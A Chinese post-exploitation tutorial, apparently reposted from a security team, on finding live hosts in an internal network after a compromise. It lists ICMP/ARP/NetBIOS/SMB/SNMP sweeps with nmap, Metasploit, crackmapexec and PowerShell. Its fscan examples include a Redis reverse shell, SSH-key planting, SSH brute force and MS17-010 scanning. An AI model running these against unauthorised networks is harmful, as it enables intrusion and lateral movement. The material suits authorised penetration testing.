0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

內(nèi)網(wǎng)主機(jī)探測(cè)工具合集

jf_vLt34KHi ? 來源:Tide安全團(tuán)隊(duì) ? 2023-05-11 11:44 ? 次閱讀

前言

在拿下通內(nèi)網(wǎng)的主機(jī)權(quán)限后,普遍需要更進(jìn)一步的收集內(nèi)網(wǎng)信息,此時(shí)如何有效快速的探測(cè)內(nèi)網(wǎng)存活主機(jī)關(guān)系到我們下一步的進(jìn)展情況。當(dāng)然自從有了Fscan后,我們的效率已經(jīng)大大提高,不過在某些情況下fscan有時(shí)會(huì)無法正常探測(cè),此時(shí)如何使用其他方法有效地收集內(nèi)網(wǎng)信息成了關(guān)鍵,這篇文章主要記錄一下在不同環(huán)境、不同條件下探測(cè)內(nèi)網(wǎng)存活主機(jī)的方法。

內(nèi)網(wǎng)主機(jī)探測(cè)的不同場(chǎng)景

我們主機(jī)掃描的場(chǎng)景主要分為三種:

1、獲取到了webshell,此時(shí)一般用系統(tǒng)命令或上傳腳本工具進(jìn)行探測(cè);

2、主機(jī)已在目標(biāo)內(nèi)網(wǎng),比如已經(jīng)通過正向或者反向代理搭建隧道的場(chǎng)景。此時(shí)可以考慮proxychains+Nmap掃描;

3、拿到了一個(gè)反彈的webshell,則可以考慮MSF。要根據(jù)不同的場(chǎng)景考慮支持存活探測(cè)的協(xié)議,包括了ARP、ICMP、SMB、 UDP、SNMP協(xié)議等;支持端口掃描的方式,包括TCP掃描、UDP掃描、ICMP掃描等。

內(nèi)網(wǎng)不同協(xié)議主機(jī)探測(cè)的方式

ICMP協(xié)議探測(cè)

它是TCP/IP協(xié)議簇的一個(gè)子協(xié)議,用于在IP主機(jī)、路由器之間傳遞控制消息??刂葡⑹侵?a href="http://srfitnesspt.com/v/tag/1722/" target="_blank">網(wǎng)絡(luò)通不通、主機(jī)是否可達(dá)、路由是否可用等網(wǎng)絡(luò)本身的消息。這些控制消息雖然并不傳輸用戶數(shù)據(jù),但是對(duì)于用戶數(shù)據(jù)的傳遞起著重要的作用。

ping

ping是我們一個(gè)常用工具,主要用來測(cè)試網(wǎng)絡(luò)連通性。也可以用它來完成對(duì)C段的探測(cè),雖然效率低時(shí)間慢,但是不易出發(fā)安全規(guī)則。(服務(wù)器開啟防火墻或者禁ping的時(shí)候不可用,否則影響探測(cè)結(jié)果)

?Windows

 for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1|find /i "ttl="

3017aef4-ef45-11ed-90ce-dac502259ad0.png

這是我在CS里執(zhí)行的ping命令,可以看到c段內(nèi)有兩臺(tái)主機(jī)存活 也可以寫進(jìn)文件里,方便后續(xù)查看。寫進(jìn)C盤的話需要administer權(quán)限,可以考慮更換盤符

@for/l%iin(1,1,255)do@ping-n1-w40192.168.1.%i&iferrorlevel1(echo192.168.1.%i>>./a.txt)else(echo192.168.1.%i>>./111.txt)

Linux

for k in $( seq 1 255);do ping -c 1 10.211.55.|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

3029e09c-ef45-11ed-90ce-dac502259ad0.png

另外,還可以結(jié)合系統(tǒng)自帶的traceroute、arp 、netstat等命令收集內(nèi)網(wǎng)信息,curl、wget可以用來做端口探測(cè)

nmap

nmap ‐sP ‐PI 192.168.1.0/24 ‐T4
#或者
nmap ‐sn ‐PE ‐T4 192.168.1.0/24

303b2ac8-ef45-11ed-90ce-dac502259ad0.png

UDP協(xié)議探測(cè)

Internet 協(xié)議集支持一個(gè)無連接的傳輸協(xié)議,該協(xié)議稱為用戶數(shù)據(jù)報(bào)協(xié)議(UDP,User Datagram Protocol)。UDP 為應(yīng)用程序提供了一種無需建立連接就可以發(fā)送封裝的 IP 數(shù)據(jù)包的方法。

Msf

msf > use auxiliary/scanner/discovery/udp_probe
或者
msf > use auxiliary/scanner/discovery/udp_sweep

3056fab4-ef45-11ed-90ce-dac502259ad0.png

nmap

sudo nmap -sU -T5 -sV --max-retries 1 10.211.55.5 -p 500

3067f314-ef45-11ed-90ce-dac502259ad0.png

unicornscan(Linux下使用)

unicornscan-mU10.255.55.5

ScanLine(Windows下使用)

sl.exe -h -u 53,161,137,139 -O C:UsersAdministratorDes
ktoplog.txt -p 192.168.1.1-254

3084c228-ef45-11ed-90ce-dac502259ad0.png

Netbios協(xié)議

NetBIOS協(xié)議是由IBM公司開發(fā),主要用于數(shù)十臺(tái)計(jì)算機(jī)的小型局域網(wǎng)。NetBIOS協(xié)議是一種在局域網(wǎng)上的程序可以使用的應(yīng)用程序編程接口(API),為程序提供了請(qǐng)求低級(jí)服務(wù)的統(tǒng)一的命令集,作用是為了給局域網(wǎng)提供網(wǎng)絡(luò)以及其他特殊功能,幾乎所有的局域網(wǎng)都是在NetBIOS協(xié)議的基礎(chǔ)上工作的。

nmap

sudo nmap -sU --script nbstat.nse -p137 192.168.1.0/24 -T4
309d8038-ef45-11ed-90ce-dac502259ad0.png

MSF

use auxiliary/scanner/netbios/nbname

30bbfef0-ef45-11ed-90ce-dac502259ad0.png

nbtscan掃描

互聯(lián)網(wǎng)搜索引擎nbtscan是一個(gè)掃描WINDOWS網(wǎng)絡(luò)NetBIOS信息的小工具,2005年11月23日發(fā)布。NBTSCAN身材嬌小,簡(jiǎn)單快速。但只能用于局域網(wǎng),可以顯示IP,主機(jī)名,用戶名稱和MAC地址等等。

下載地址:
http://www.unixwiz.net/tools/nbtscan.html#download
以Windows用法為例:nbtscan-1.0.35.exe -m 10.211.55.0/24

30d1674a-ef45-11ed-90ce-dac502259ad0.png

ARP協(xié)議

這是根據(jù)IP地址獲取物理地址的一個(gè)TCP/IP協(xié)議。主機(jī)發(fā)送信息時(shí)將包含目標(biāo)IP地址的ARP請(qǐng)求廣播到局域網(wǎng)絡(luò)上的所有主機(jī),并接收返回消息,以此確定目標(biāo)的物理地址;收到返回消息后將該IP地址和物理地址存入本機(jī)ARP緩存中并保留一定時(shí)間,下次請(qǐng)求時(shí)直接查詢ARP緩存以節(jié)約資源。

nmap

nmap -sn -PR 10.211.55.1/24

30dd45f6-ef45-11ed-90ce-dac502259ad0.png

MSF

use auxiliary/scanner/discovery/arp_sweep

30f8caf6-ef45-11ed-90ce-dac502259ad0.png

netdiscover

Netdiscover是一種網(wǎng)絡(luò)掃描工具,通過ARP掃描發(fā)現(xiàn)活動(dòng)主機(jī),可以通過主動(dòng)和被動(dòng)兩種模式進(jìn)行ARP掃描。通過主動(dòng)發(fā)送ARP請(qǐng)求檢查網(wǎng)絡(luò)ARP流量,通過自動(dòng)掃描模式掃描網(wǎng)絡(luò)地址。

sudo netdiscover -r 10.211.55.0/24 -i eth0

310c77fe-ef45-11ed-90ce-dac502259ad0.png

arp-scan

可以看到這工具掃描速度挺快的

sudo arp-scan --interface=eth0 --localnet

311ff5f4-ef45-11ed-90ce-dac502259ad0.png

SMB協(xié)議

SMB(Server Message Block)通信協(xié)議是微軟和英特爾在1987年制定的協(xié)議,主要是作為Microsoft網(wǎng)絡(luò)的通訊協(xié)議。SMB 是在會(huì)話層(session layer)和表示層(presentation layer)以及小部分應(yīng)用層(application layer)的協(xié)議。

Msf

use auxiliary/scanner/smb/smb_version

3135cfdc-ef45-11ed-90ce-dac502259ad0.png

nmap

nmap -sU -sS --script smb-enum-shares.nse  -p 445 10.211.55.3

314bb8ec-ef45-11ed-90ce-dac502259ad0.png通過cmd
for /l %a in (1,1,254) do start /min /low telnet 10.211.55.%a 445

crackmapexec

CrackMapExec(CME)是一款后滲透利用工具,可幫助自動(dòng)化大型活動(dòng)目錄(AD)網(wǎng)絡(luò)安全評(píng)估任務(wù)。其締造者@byt3bl33d3r稱,該工具的生存概念是,“利用AD內(nèi)置功能/協(xié)議達(dá)成其功能,并規(guī)避大多數(shù)終端防護(hù)/IDS/IPS解決方案?!?/p>

cme smb 10.211.55.0/24

SNMP協(xié)議

SNMP 是專門設(shè)計(jì)用于在 IP 網(wǎng)絡(luò)管理網(wǎng)絡(luò)節(jié)點(diǎn)(服務(wù)器、工作站、路由器、交換機(jī)及HUBS等)的一種標(biāo)準(zhǔn)協(xié)議,它是一種應(yīng)用層協(xié)議。SNMP 使網(wǎng)絡(luò)管理員能夠管理網(wǎng)絡(luò)效能,發(fā)現(xiàn)并解決網(wǎng)絡(luò)問題以及規(guī)劃網(wǎng)絡(luò)增長。通過 SNMP 接收隨機(jī)消息(及事件報(bào)告)網(wǎng)絡(luò)管理系統(tǒng)獲知網(wǎng)絡(luò)出現(xiàn)問題。

nmap

sudo nmap -sU --script snmp-brute 10.211.55.0/24 -T4

3165bc10-ef45-11ed-90ce-dac502259ad0.png

Msf

use auxiliary/scanner/snmp/snmp_enum
317fa922-ef45-11ed-90ce-dac502259ad0.png

snmp for pl

這些 perl 腳本用于從目標(biāo)系統(tǒng)中提取 SNMP 數(shù)據(jù)并解析這些文件以獲取潛在的可用數(shù)據(jù)。

項(xiàng)目地址:https://github.com/dheiland-r7/snmp

這個(gè)工具在使用前需要編譯,這里參考網(wǎng)上大佬的教程

wget http://www.cpan.org/modules/by-module/NetAddr/NetAddr-IP-4.078.tar.gz
tar xvzf ./NetAddr-IP-4.078.tar.gz
cd NetAddr-IP-4.078/
perl Makefile.PL
make
make install

31991dda-ef45-11ed-90ce-dac502259ad0.png
使用方法:./snmpbw.pl 192.168.0.1 public 2 1
 ./snmpbw.pl ipfile.txt  public 2 4

31b43d9a-ef45-11ed-90ce-dac502259ad0.png

常見的一些其它工具

Fscan

這個(gè)就不多介紹了,太常見

fscan -h 192.168.1.1/24
fscan.exe -h 192.168.1.1/24  (默認(rèn)使用全部模塊)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫私鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計(jì)劃任務(wù)反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令執(zhí)行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模塊ssh和端口)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模塊)

通過powershell腳本掃描IP地址存活

這里列舉幾個(gè)項(xiàng)目地址:

https://github.com/nettitude/PoshC2_Old/blob/master/Modules/Invoke-Arpscan.ps1
https://github.com/dwj7738/My-Powershell-Repository/blob/master/Scripts/Invoke-TSPingSweep.ps1

使用方法:

powershell.exe -exec bypass -Command "Import-Module .arpscan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24"
powershell.exe -exec bypass -Command "Import-Module ./Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.1.0 -EndAddress 192.168.1.255"
此外,還可以用powershell實(shí)現(xiàn)基本的端口掃描功能

針對(duì)單個(gè)IP的多個(gè)端口的掃描

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.3",$_)) "Port $_ is open!"} 2>$null

31c9359c-ef45-11ed-90ce-dac502259ad0.png針對(duì)單個(gè)IP的多個(gè)端口的掃描
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.3",$_)) "Port $_ is open!"} 2>$null
31de04f4-ef45-11ed-90ce-dac502259ad0.png針對(duì)某IP段 & 多個(gè)端口的掃描
1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.$a",$_)) "Port $_ is open!"} 2>$null}
31ed3bb8-ef45-11ed-90ce-dac502259ad0.png

PTscan

PTscan(Phantom scanner) 是一款界面友好的輕量級(jí)web應(yīng)用資產(chǎn)掃描器,適合于內(nèi)網(wǎng)滲透測(cè)試環(huán)境下web的資產(chǎn)快捷識(shí)別,只需Python環(huán)境,無需第三方擴(kuò)展庫,掃描結(jié)果使用zoomeye網(wǎng)頁樣式。
PTscan參考了F-NAScan的設(shè)計(jì)思路,在其基礎(chǔ)上修改而成,把程序重心放在WEB掃描和識(shí)別功能上。
使用方法:

Usage: python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306]  [-m 50] [-t 10] [-n] [-b] [-r]
##
-f  指定掃描目標(biāo)文件,文件格式如list.txt所示,同時(shí)支持IP和URL
-h  指定掃描IP或IP段,支持段掃描,如192.168.1 即為掃描C段,192.168 即為掃描B段
-p  指定掃描端口,缺省使用程序中的配置端口
-m  指定線程數(shù)
-t  指定timeout
-n  不進(jìn)行ping操作,直接掃描
-b  開啟Banner識(shí)別

-r ReverseIP



審核編輯 :李倩


聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • Web
    Web
    +關(guān)注

    關(guān)注

    2

    文章

    1254

    瀏覽量

    69231
  • UDP協(xié)議
    +關(guān)注

    關(guān)注

    0

    文章

    68

    瀏覽量

    12670
  • 數(shù)據(jù)包
    +關(guān)注

    關(guān)注

    0

    文章

    244

    瀏覽量

    24328

原文標(biāo)題:內(nèi)網(wǎng)主機(jī)探測(cè)工具合集

文章出處:【微信號(hào):Tide安全團(tuán)隊(duì),微信公眾號(hào):Tide安全團(tuán)隊(duì)】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦

    幫朋友做的脈沖探測(cè)主機(jī)

    探測(cè)主機(jī)
    電子愛好者(松哥)
    發(fā)布于 :2023年12月08日 11:50:47

    Labview如何在兩臺(tái)不同內(nèi)網(wǎng)主機(jī)的vi之間通信

    我想問下,如何在當(dāng)前主機(jī)vi中的子面板里顯示和控制另一個(gè)遠(yuǎn)程主機(jī)中的vi程序呢?兩臺(tái)機(jī)器不在一個(gè)局域網(wǎng)內(nèi),有可能都不是公網(wǎng)IP,用路由器接上互聯(lián)網(wǎng)的,這時(shí)候怎么樣實(shí)現(xiàn)兩臺(tái)內(nèi)網(wǎng)主機(jī)之間的通信,不是用web發(fā)布;望知道的大神指點(diǎn)迷津
    發(fā)表于 08-19 17:07

    【W(wǎng)RTnode2R申請(qǐng)】物聯(lián)網(wǎng)主機(jī)

    申請(qǐng)理由:原有方案使用stm32以及工控機(jī),對(duì)wifi的原生支持不太好,因?yàn)槭謾C(jī)等聯(lián)網(wǎng)比較麻煩,畢竟農(nóng)業(yè)物聯(lián)網(wǎng)不具備特別好的實(shí)施環(huán)境所以我準(zhǔn)備換掉方案項(xiàng)目描述:準(zhǔn)備實(shí)現(xiàn)新版本的農(nóng)業(yè)物聯(lián)網(wǎng)主機(jī),代替
    發(fā)表于 09-10 11:27

    nat的類型有哪些

    NAT分為兩大類,基本的NAT和NAPT(Network Address/Port Translator)。 基本的NAT,它僅將內(nèi)網(wǎng)主機(jī)的私有IP地址轉(zhuǎn)換成公網(wǎng)IP地址,但并不將TCP/UDP端口
    發(fā)表于 11-04 09:17

    FPipe是怎樣通過本地的53端口轉(zhuǎn)發(fā)到內(nèi)網(wǎng)的3389端口上的

    0.0.0.0 -s 53 -r 3389 192.168.222.137然后回到本地來遠(yuǎn)程連接就可以了 0x03 msf正向上線這里我們使用bind型的payload,保證讓無法正常上網(wǎng)的內(nèi)網(wǎng)主機(jī)也能正常反彈
    發(fā)表于 07-25 15:04

    四個(gè)方法探測(cè)服務(wù)器的內(nèi)網(wǎng)存活主機(jī)

    在滲透中,當(dāng)我們拿下一臺(tái)服務(wù)器作為跳板機(jī)進(jìn)一步進(jìn)行內(nèi)網(wǎng)滲透時(shí),往往需要通過主機(jī)存活探測(cè)和端口掃描來收集內(nèi)網(wǎng)資產(chǎn)。
    的頭像 發(fā)表于 09-27 15:18 ?1.3w次閱讀
    四個(gè)方法<b class='flag-5'>探測(cè)</b>服務(wù)器的<b class='flag-5'>內(nèi)網(wǎng)</b>存活<b class='flag-5'>主機(jī)</b>

    外網(wǎng)用戶通過外網(wǎng)地址訪問內(nèi)網(wǎng)服務(wù)器實(shí)驗(yàn)配置

    網(wǎng)主機(jī)通過域名訪問Web服務(wù)器,首先需要通過訪問內(nèi)網(wǎng)DNS服務(wù)器獲取Web服務(wù)器的IP地址,因此需要通過配置NAT內(nèi)部服務(wù)器將DNS服務(wù)器的內(nèi)網(wǎng)IP地址和DNS服務(wù)端口映射為一個(gè)外網(wǎng)地址和端口。
    的頭像 發(fā)表于 08-31 10:53 ?2843次閱讀

    一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測(cè)漏洞掃描工具SweetBabyScan

    輕量級(jí)內(nèi)網(wǎng)資產(chǎn)探測(cè)漏洞掃描工具:SweetBabyScan,是一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測(cè)漏洞掃描
    的頭像 發(fā)表于 12-02 09:23 ?4591次閱讀

    一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測(cè)漏洞掃描工具

    甜心寶貝是一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測(cè)漏洞掃描工具,集成了Xray與Nuclei的Poc。
    的頭像 發(fā)表于 12-14 09:48 ?3884次閱讀

    一款內(nèi)網(wǎng)探測(cè)工具

    工具內(nèi)置 Top1000 端口探測(cè)同時(shí)也支持自定義端口探測(cè),支持最新 nmap_service_probes 規(guī)則進(jìn)行服務(wù)指紋識(shí)別,支持對(duì) SSH/SMB/Mysql/SqlServer
    的頭像 發(fā)表于 08-09 16:09 ?527次閱讀

    內(nèi)網(wǎng)穿透工具的種類、原理和使用方法

    本文以滲透的視角,總結(jié)幾種個(gè)人常用的內(nèi)網(wǎng)穿透,內(nèi)網(wǎng)代理工具,介紹其簡(jiǎn)單原理和使用方法。
    的頭像 發(fā)表于 08-25 10:35 ?1667次閱讀
    <b class='flag-5'>內(nèi)網(wǎng)</b>穿透<b class='flag-5'>工具</b>的種類、原理和使用方法

    什么是nps?常見內(nèi)網(wǎng)穿透工具有哪些?

    nps是一款輕量級(jí)、高性能、功能強(qiáng)大的內(nèi)網(wǎng)穿透代理服務(wù)器。 目前支持tcp、udp流量轉(zhuǎn)發(fā),可支持任何tcp、udp上層協(xié)議(訪問內(nèi)網(wǎng)網(wǎng)站、本地支付接口調(diào)試、ssh訪問、遠(yuǎn)程桌面,內(nèi)網(wǎng)dns
    發(fā)表于 08-31 10:32 ?1698次閱讀
    什么是nps?常見<b class='flag-5'>內(nèi)網(wǎng)</b>穿透<b class='flag-5'>工具</b>有哪些?

    智慧樓宇的心臟:E6000物聯(lián)網(wǎng)主機(jī)

    智慧樓宇是指通過全面覆蓋的感知設(shè)備和互聯(lián)網(wǎng)技術(shù),為建筑提供高效、舒適、安全、環(huán)保、可持續(xù)的智能化服務(wù)。 在科技快速發(fā)展的今天,智慧樓宇已經(jīng)不再是遙不可及的夢(mèng)想。而在這個(gè)夢(mèng)想成真的過程中,物聯(lián)網(wǎng)主機(jī)
    的頭像 發(fā)表于 02-23 16:36 ?344次閱讀
    智慧樓宇的心臟:E6000物聯(lián)<b class='flag-5'>網(wǎng)主機(jī)</b>

    物聯(lián)網(wǎng)主機(jī):為智能交通賦能

    物聯(lián)網(wǎng)(IoT)技術(shù)的發(fā)展為智能交通領(lǐng)域帶來了許多創(chuàng)新的解決方案。而在物聯(lián)網(wǎng)應(yīng)用中,物聯(lián)網(wǎng)主機(jī)起著關(guān)鍵的作用。本文將為大家介紹一款名為E6000的物聯(lián)網(wǎng)主機(jī),它是一種多協(xié)議、多接口的物聯(lián)網(wǎng)主機(jī),為
    的頭像 發(fā)表于 02-23 16:44 ?432次閱讀
    物聯(lián)<b class='flag-5'>網(wǎng)主機(jī)</b>:為智能交通賦能

    物聯(lián)網(wǎng)主機(jī) E6000 在智慧工地上的應(yīng)用

    隨著科技的不斷發(fā)展,智慧工地的概念逐漸普及。物聯(lián)網(wǎng)技術(shù)的應(yīng)用為工地管理帶來了革命性的變化,物聯(lián)網(wǎng)主機(jī)E6000作為一款領(lǐng)先的物聯(lián)網(wǎng)主機(jī)設(shè)備,在智慧工地上發(fā)揮著重要作用。 物聯(lián)網(wǎng)主機(jī) E6000
    的頭像 發(fā)表于 06-20 16:03 ?232次閱讀
    物聯(lián)<b class='flag-5'>網(wǎng)主機(jī)</b> E6000 在智慧工地上的應(yīng)用